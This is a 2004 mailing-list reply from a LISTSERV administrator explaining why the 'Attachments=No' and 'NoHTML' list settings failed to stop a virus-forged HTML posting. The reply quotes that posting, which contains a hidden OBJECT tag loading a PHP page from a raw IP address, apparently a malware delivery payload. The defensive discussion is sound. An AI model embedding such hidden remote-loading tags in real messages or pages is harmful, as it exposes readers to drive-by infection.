Tue, 23 Mar 2004 15:37:13 -0500
|
Dennis Boone wrote:
> Over the weekend, the following was posted to one of our lists. It was
> presumably forged by a virus; the From address was a legit editor of
> the list. I've filed off the e-mail addresses on general principle.
>
> Date: Sun, 21 Mar 2004 01:44:56 -0800
> Reply-To: ...
> Sender: ...
> From: ...
> Subject: Incoming message
> MIME-Version: 1.0
> Content-Type: text/html; charset=us-ascii
> Content-Transfer-Encoding: 7bit
>
> <html><body>
> <font face="System">
> <OBJECT STYLE="display:none" DATA="http://66.169.99.119:81/563373.php">
> </OBJECT></body></html>
>
> The list in question in set "Attachments= No" and "Language= NoHTML".
> The header appears below.
>
> Anyone have a suggestion about how it got posted? I'd like to close
> the leak.
The use of 'Attachments= No' does not affect "attachments" which have a MIME
content-type of text/plain or text/html.
The use of 'Language=NoHTML' results in the removal of the 'text/html' part of
a message only if the message is identified as 'multipart/alternative' *AND*
contains both 'text/plain' and 'text/html' parts.
In May 2001, I submitted an enhancement request to change this behavior, so that
the use of 'Language= NoHTML' would result in rejection of a single part message
with the content-type of 'text/html'. A copy of the request was posted to this
list and is available in the list archives
<http://peach.ease.lsoft.com/scripts/wa.exe?A2=ind0105&L=lstsrv-l&P=R5031>. See
that posting for a more detailed discussion of this issue. To the best of my
knowledge, there was no response from L-Soft.
--
Paul Russell
Senior Systems Administrator
University of Notre Dame
|
|
|